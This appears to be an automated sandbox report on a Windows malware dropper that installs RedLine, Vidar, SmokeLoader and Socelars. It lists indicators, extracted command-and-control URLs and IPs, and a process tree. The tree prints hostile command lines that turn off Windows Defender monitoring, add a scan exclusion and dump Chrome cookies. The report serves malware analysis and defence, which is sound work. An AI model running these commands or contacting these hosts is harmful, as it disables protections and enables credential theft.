Analysis
Max time kernel: 67s
Max time network: 177s
Platform: windows10_x64
Resource: win10-en-20211208
Submitted: 23/12/2021, 13:28
Static task: static1
Behavioral task: behavioral1
Sample: 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe
Resource: win7-en-20211208
General
Target: 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe
Size: 7.1MB
MD5: 3a48bfd136709a9083047a674a69f1f9
SHA1: f21601d486c7127b24329c9387941aa163574c0f
SHA256: 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8
SHA512: e237d9cc909a4530a873eaf47d68fccc11b100997cdcad07197a9d9848248759e5996b4f83780efac439164942a72355b6a5b60388e38f1885ce7a0b11643239
Malware Config
Extracted: socelars
  http://www.biohazardgraphics.com/
Extracted: vidar
  49.2
  915
  https://mstdn.social/@kipriauk9
  https://qoto.org/@kipriauk8
  profile_id: 915
Extracted: smokeloader
  2020
  http://rcacademy.at/upload/
  http://e-lanpengeonline.com/upload/
  http://vjcmvz.cn/upload/
  http://galala.ru/upload/
  http://witra.ru/upload/
Extracted: redline
  media22ns
  65.108.69.168:13293
Extracted: redline
  v3user1
  159.69.246.184:13127
Signatures

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4692 | 4576 | rundll32.exe | 121
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (8 IoCs)
resource | yara_rule
behavioral2/memory/4588-312-0x0000000000419336-mapping.dmp | family_redline
behavioral2/memory/4588-310-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/4604-311-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/4604-313-0x0000000000419336-mapping.dmp | family_redline
behavioral2/memory/4588-317-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/4588-319-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/4604-318-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/4604-316-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x000500000001ab1f-180.dat | family_socelars
behavioral2/files/0x000500000001ab1f-152.dat | family_socelars
suricata: ET MALWARE GCleaner Downloader Activity M5

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
NirSoft WebBrowserPassView (3 IoCs)
Password recovery tool for various web browsers
resource | yara_rule
behavioral2/files/0x000500000001ab27-207.dat | WebBrowserPassView
behavioral2/files/0x000500000001ab27-164.dat | WebBrowserPassView
behavioral2/memory/2340-366-0x0000000000400000-0x000000000047C000-memory.dmp | WebBrowserPassView

Nirsoft (4 IoCs)
resource | yara_rule
behavioral2/files/0x000500000001ab27-207.dat | Nirsoft
behavioral2/files/0x000500000001ab27-164.dat | Nirsoft
behavioral2/memory/4928-328-0x0000000000400000-0x0000000000455000-memory.dmp | Nirsoft
behavioral2/memory/2340-366-0x0000000000400000-0x000000000047C000-memory.dmp | Nirsoft

Vidar Stealer (2 IoCs)
resource | yara_rule
behavioral2/memory/2128-248-0x0000000000E70000-0x0000000000F45000-memory.dmp | family_vidar
behavioral2/memory/2128-249-0x0000000000400000-0x00000000008B2000-memory.dmp | family_vidar

resource | yara_rule
behavioral2/files/0x000600000001ab12-125.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab12-127.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab10-126.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab10-132.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab10-131.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab14-130.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab14-133.dat | aspack_v212_v242
Downloads MZ/PE file

Executes dropped EXE (20 IoCs)
pid | Process
836 | setup_installer.exe
3392 | setup_install.exe
2128 | Thu00da98426c.exe
2092 | Thu00b8fd4ecc01704f.exe
3952 | Thu0077887e5daa8.exe
2336 | Thu00a73c6023a843a.exe
3084 | Thu00cb65ad73a02.exe
3708 | Thu006ed6d1f277becf2.exe
1724 | Thu002ed3939609a.exe
1876 | Thu00d08a9d76e3.exe
848 | Thu004af3e2f6505725.exe
2340 | 11111.exe
1356 | Thu00d721da438.exe
3632 | Thu00516cc538bf9ef.exe
3276 | Thu00cb65ad73a02.exe
3872 | Thu0085233abe88018.exe
3164 | Thu00a0763418baa.exe
752 | msiexec.exe
2288 | Thu008eaab40b8d4438f.exe
2096 | Thu004af3e2f6505725.tmp

Loads dropped DLL (8 IoCs)
pid | Process
3392 | setup_install.exe
3392 | setup_install.exe
3392 | setup_install.exe
3392 | setup_install.exe
3392 | setup_install.exe
3392 | setup_install.exe
3392 | setup_install.exe
3392 | setup_install.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
13 | ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 3084 set thread context of 3276 | 3084 | Thu00cb65ad73a02.exe | 96

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Kills process with taskkill (2 IoCs)
pid | Process
4780 | taskkill.exe
4772 | taskkill.exe
Suspicious use of AdjustPrivilegeToken (36 IoCs)
description | pid | Process
Token: SeCreateTokenPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeAssignPrimaryTokenPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeLockMemoryPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeIncreaseQuotaPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeMachineAccountPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeTcbPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeSecurityPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeTakeOwnershipPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeLoadDriverPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeSystemProfilePrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeSystemtimePrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeProfSingleProcessPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeIncBasePriorityPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeCreatePagefilePrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeCreatePermanentPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeBackupPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeRestorePrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeShutdownPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeDebugPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeAuditPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeSystemEnvironmentPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeChangeNotifyPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeRemoteShutdownPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeUndockPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeSyncAgentPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeEnableDelegationPrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeManageVolumePrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeImpersonatePrivilege | 3952 | Thu0077887e5daa8.exe
Token: SeCreateGlobalPrivilege | 3952 | Thu0077887e5daa8.exe
Token: 31 | 3952 | Thu0077887e5daa8.exe
Token: 32 | 3952 | Thu0077887e5daa8.exe
Token: 33 | 3952 | Thu0077887e5daa8.exe
Token: 34 | 3952 | Thu0077887e5daa8.exe
Token: 35 | 3952 | Thu0077887e5daa8.exe
Token: SeDebugPrivilege | 3632 | Thu00516cc538bf9ef.exe
Token: SeDebugPrivilege | 3164 | Thu00a0763418baa.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 664 wrote to memory of 836 | 664 | 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe | 69
PID 664 wrote to memory of 836 | 664 | 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe | 69
PID 664 wrote to memory of 836 | 664 | 3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe | 69
PID 836 wrote to memory of 3392 | 836 | setup_installer.exe | 70
PID 836 wrote to memory of 3392 | 836 | setup_installer.exe | 70
PID 836 wrote to memory of 3392 | 836 | setup_installer.exe | 70
PID 3392 wrote to memory of 3116 | 3392 | setup_install.exe | 73
PID 3392 wrote to memory of 3116 | 3392 | setup_install.exe | 73
PID 3392 wrote to memory of 3116 | 3392 | setup_install.exe | 73
PID 3392 wrote to memory of 3092 | 3392 | setup_install.exe | 74
PID 3392 wrote to memory of 3092 | 3392 | setup_install.exe | 74
PID 3392 wrote to memory of 3092 | 3392 | setup_install.exe | 74
PID 3392 wrote to memory of 2312 | 3392 | setup_install.exe | 75
PID 3392 wrote to memory of 2312 | 3392 | setup_install.exe | 75
PID 3392 wrote to memory of 2312 | 3392 | setup_install.exe | 75
PID 3392 wrote to memory of 1220 | 3392 | setup_install.exe | 76
PID 3392 wrote to memory of 1220 | 3392 | setup_install.exe | 76
PID 3392 wrote to memory of 1220 | 3392 | setup_install.exe | 76
PID 3392 wrote to memory of 1168 | 3392 | setup_install.exe | 77
PID 3392 wrote to memory of 1168 | 3392 | setup_install.exe | 77
PID 3392 wrote to memory of 1168 | 3392 | setup_install.exe | 77
PID 3392 wrote to memory of 3684 | 3392 | setup_install.exe | 111
PID 3392 wrote to memory of 3684 | 3392 | setup_install.exe | 111
PID 3392 wrote to memory of 3684 | 3392 | setup_install.exe | 111
PID 3392 wrote to memory of 2568 | 3392 | setup_install.exe | 110
PID 3392 wrote to memory of 2568 | 3392 | setup_install.exe | 110
PID 3392 wrote to memory of 2568 | 3392 | setup_install.exe | 110
PID 3392 wrote to memory of 1984 | 3392 | setup_install.exe | 109
PID 3392 wrote to memory of 1984 | 3392 | setup_install.exe | 109
PID 3392 wrote to memory of 1984 | 3392 | setup_install.exe | 109
PID 3392 wrote to memory of 1668 | 3392 | setup_install.exe | 78
PID 3392 wrote to memory of 1668 | 3392 | setup_install.exe | 78
PID 3392 wrote to memory of 1668 | 3392 | setup_install.exe | 78
PID 3392 wrote to memory of 1320 | 3392 | setup_install.exe | 108
PID 3392 wrote to memory of 1320 | 3392 | setup_install.exe | 108
PID 3392 wrote to memory of 1320 | 3392 | setup_install.exe | 108
PID 3392 wrote to memory of 1888 | 3392 | setup_install.exe | 79
PID 3392 wrote to memory of 1888 | 3392 | setup_install.exe | 79
PID 3392 wrote to memory of 1888 | 3392 | setup_install.exe | 79
PID 3392 wrote to memory of 2216 | 3392 | setup_install.exe | 81
PID 3392 wrote to memory of 2216 | 3392 | setup_install.exe | 81
PID 3392 wrote to memory of 2216 | 3392 | setup_install.exe | 81
PID 3392 wrote to memory of 1680 | 3392 | setup_install.exe | 82
PID 3392 wrote to memory of 1680 | 3392 | setup_install.exe | 82
PID 3392 wrote to memory of 1680 | 3392 | setup_install.exe | 82
PID 2568 wrote to memory of 2128 | 2568 | cmd.exe | 80
PID 2568 wrote to memory of 2128 | 2568 | cmd.exe | 80
PID 2568 wrote to memory of 2128 | 2568 | cmd.exe | 80
PID 1168 wrote to memory of 2092 | 1168 | cmd.exe | 107
PID 1168 wrote to memory of 2092 | 1168 | cmd.exe | 107
PID 1168 wrote to memory of 2092 | 1168 | cmd.exe | 107
PID 2312 wrote to memory of 3952 | 2312 | cmd.exe | 83
PID 2312 wrote to memory of 3952 | 2312 | cmd.exe | 83
PID 2312 wrote to memory of 3952 | 2312 | cmd.exe | 83
PID 3684 wrote to memory of 2336 | 3684 | cmd.exe | 106
PID 3684 wrote to memory of 2336 | 3684 | cmd.exe | 106
PID 3684 wrote to memory of 2336 | 3684 | cmd.exe | 106
PID 3392 wrote to memory of 2320 | 3392 | setup_install.exe | 85
PID 3392 wrote to memory of 2320 | 3392 | setup_install.exe | 85
PID 3392 wrote to memory of 2320 | 3392 | setup_install.exe | 85
PID 1320 wrote to memory of 3084 | 1320 | cmd.exe | 84
PID 1320 wrote to memory of 3084 | 1320 | cmd.exe | 84
PID 1320 wrote to memory of 3084 | 1320 | cmd.exe | 84
PID 3392 wrote to memory of 2268 | 3392 | setup_install.exe | 105
Processes

* C:\Users\Admin\AppData\Local\Temp\3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe (PID 664)
    Command line: "C:\Users\Admin\AppData\Local\Temp\3fa8be5f12b636409efb929e15fff3a2bd9a6f35cdbce30c8d6ad46b612cccb8.exe"
    - Suspicious use of WriteProcessMemory
  * C:\Users\Admin\AppData\Local\Temp\setup_installer.exe (PID 836)
      Command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\setup_install.exe (PID 3392)
        Command line: "C:\Users\Admin\AppData\Local\Temp\7zS4432B086\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      * C:\Windows\SysWOW64\cmd.exe (PID 3116)
          Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1544)
            Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      * C:\Windows\SysWOW64\cmd.exe (PID 3092)
          Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3984)
            Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      * C:\Windows\SysWOW64\cmd.exe (PID 2312)
          Command line: C:\Windows\system32\cmd.exe /c Thu0077887e5daa8.exe
          - Suspicious use of WriteProcessMemory
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0077887e5daa8.exe (PID 3952)
            Command line: Thu0077887e5daa8.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
          * C:\Windows\SysWOW64\cmd.exe (PID 4472)
              Command line: cmd.exe /c taskkill /f /im chrome.exe
            * C:\Windows\SysWOW64\taskkill.exe (PID 4780)
                Command line: taskkill /f /im chrome.exe
                - Kills process with taskkill
      * C:\Windows\SysWOW64\cmd.exe (PID 1220)
          Command line: C:\Windows\system32\cmd.exe /c Thu00d08a9d76e3.exe
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00d08a9d76e3.exe (PID 1876)
            Command line: Thu00d08a9d76e3.exe
            - Executes dropped EXE
          * C:\Windows\SysWOW64\msiexec.exe (PID 4124)
              Command line: "C:\Windows\System32\msiexec.exe" -Y .\5vk3Dqn.9sa
      * C:\Windows\SysWOW64\cmd.exe (PID 1168)
          Command line: C:\Windows\system32\cmd.exe /c Thu00b8fd4ecc01704f.exe
          - Suspicious use of WriteProcessMemory
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00b8fd4ecc01704f.exe (PID 2092)
            Command line: Thu00b8fd4ecc01704f.exe
            - Executes dropped EXE
          * C:\Windows\SysWOW64\msiexec.exe (PID 752)
              Command line: "C:\Windows\System32\msiexec.exe" -Y .\5vk3Dqn.9sa
              - Executes dropped EXE
      * C:\Windows\SysWOW64\cmd.exe (PID 1668)
          Command line: C:\Windows\system32\cmd.exe /c Thu00d721da438.exe
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00d721da438.exe (PID 1356)
            Command line: Thu00d721da438.exe
            - Executes dropped EXE
          * C:\Users\Admin\AppData\Local\Temp\11111.exe (PID 4928)
              Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          * C:\Users\Admin\AppData\Local\Temp\11111.exe (PID 2340)
              Command line: C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Executes dropped EXE
      * C:\Windows\SysWOW64\cmd.exe (PID 1888)
          Command line: C:\Windows\system32\cmd.exe /c Thu004af3e2f6505725.exe
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe (PID 848)
            Command line: Thu004af3e2f6505725.exe
            - Executes dropped EXE
      * C:\Windows\SysWOW64\cmd.exe (PID 2216)
          Command line: C:\Windows\system32\cmd.exe /c Thu002ed3939609a.exe
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu002ed3939609a.exe (PID 1724)
            Command line: Thu002ed3939609a.exe
            - Executes dropped EXE
      * C:\Windows\SysWOW64\cmd.exe (PID 1680)
          Command line: C:\Windows\system32\cmd.exe /c Thu006ed6d1f277becf2.exe
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu006ed6d1f277becf2.exe (PID 3708)
            Command line: Thu006ed6d1f277becf2.exe
            - Executes dropped EXE
      * C:\Windows\SysWOW64\cmd.exe (PID 2320)
          Command line: C:\Windows\system32\cmd.exe /c Thu0085233abe88018.exe
        * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0085233abe88018.exe (PID 3872)
            Command line: Thu0085233abe88018.exe
            - Executes dropped EXE
          * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0085233abe88018.exe (PID 4604)
              Command line: C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0085233abe88018.exe
      * C:\Windows\SysWOW64\cmd.exe (PID 3800)
          Command line: C:\Windows\system32\cmd.exe /c Thu008eaab40b8d4438f.exe
      * C:\Windows\SysWOW64\cmd.exe (PID 1536)
          Command line: C:\Windows\system32\cmd.exe /c Thu00a0763418baa.exe
      * C:\Windows\SysWOW64\cmd.exe (PID 2268)
          Command line: C:\Windows\system32\cmd.exe /c Thu00516cc538bf9ef.exe
      * C:\Windows\SysWOW64\cmd.exe (PID 1320)
          Command line: C:\Windows\system32\cmd.exe /c Thu00cb65ad73a02.exe /mixtwo
          - Suspicious use of WriteProcessMemory
      * C:\Windows\SysWOW64\cmd.exe (PID 1984)
          Command line: C:\Windows\system32\cmd.exe /c Thu0059e5559dc713.exe
      * C:\Windows\SysWOW64\cmd.exe (PID 2568)
          Command line: C:\Windows\system32\cmd.exe /c Thu00da98426c.exe
          - Suspicious use of WriteProcessMemory
      * C:\Windows\SysWOW64\cmd.exe (PID 3684)
          Command line: C:\Windows\system32\cmd.exe /c Thu00a73c6023a843a.exe
          - Suspicious use of WriteProcessMemory
* C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00da98426c.exe (PID 2128)
    Command line: Thu00da98426c.exe
    - Executes dropped EXE

* C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00cb65ad73a02.exe (PID 3084)
    Command line: Thu00cb65ad73a02.exe /mixtwo
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
  * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00cb65ad73a02.exe (PID 3276)
      Command line: Thu00cb65ad73a02.exe /mixtwo
      - Executes dropped EXE
    * C:\Windows\SysWOW64\cmd.exe (PID 4460)
        Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu00cb65ad73a02.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00cb65ad73a02.exe" & exit
      * C:\Windows\SysWOW64\taskkill.exe (PID 4772)
          Command line: taskkill /im "Thu00cb65ad73a02.exe" /f
          - Kills process with taskkill
* C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu0059e5559dc713.exe (PID 2340)
    Command line: Thu0059e5559dc713.exe

* C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu008eaab40b8d4438f.exe (PID 752)
    Command line: Thu008eaab40b8d4438f.exe
  * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu008eaab40b8d4438f.exe (PID 2288)
      Command line: "C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu008eaab40b8d4438f.exe" -u
      - Executes dropped EXE

* C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a0763418baa.exe (PID 3164)
    Command line: Thu00a0763418baa.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
* C:\Users\Admin\AppData\Local\Temp\is-GJ4JN.tmp\Thu004af3e2f6505725.tmp (PID 2096)
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-GJ4JN.tmp\Thu004af3e2f6505725.tmp" /SL5="$70062,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe"
    - Executes dropped EXE
  * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe (PID 3208)
      Command line: "C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe" /SILENT
    * C:\Users\Admin\AppData\Local\Temp\is-8VHP4.tmp\Thu004af3e2f6505725.tmp (PID 4116)
        Command line: "C:\Users\Admin\AppData\Local\Temp\is-8VHP4.tmp\Thu004af3e2f6505725.tmp" /SL5="$50084,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu004af3e2f6505725.exe" /SILENT
      * C:\Users\Admin\AppData\Local\Temp\is-OFH8C.tmp\windllhost.exe (PID 4860)
          Command line: "C:\Users\Admin\AppData\Local\Temp\is-OFH8C.tmp\windllhost.exe" 77

* C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00516cc538bf9ef.exe (PID 3632)
    Command line: Thu00516cc538bf9ef.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

* C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a73c6023a843a.exe (PID 2336)
    Command line: Thu00a73c6023a843a.exe
    - Executes dropped EXE
  * C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a73c6023a843a.exe (PID 4588)
      Command line: C:\Users\Admin\AppData\Local\Temp\7zS4432B086\Thu00a73c6023a843a.exe
* C:\Windows\system32\rundll32.exe (PID 4692)
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
  * C:\Windows\SysWOW64\rundll32.exe (PID 4724)
      Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

* C:\Windows\system32\svchost.exe (PID 2572)
    Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService

* C:\Windows\system32\LogonUI.exe (PID 4316)
    Command line: "LogonUI.exe" /flags:0x0 /state0:0xa3ad3055 /state1:0x41c64e6d

* C:\Windows\system32\svchost.exe (PID 3508)
    Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService

* C:\Windows\system32\svchost.exe (PID 4956)
    Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService

* C:\Windows\system32\svchost.exe (PID 4888)
    Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService

* C:\Windows\system32\svchost.exe (PID 4776)
    Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService

* C:\Windows\system32\svchost.exe (PID 4520)
    Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService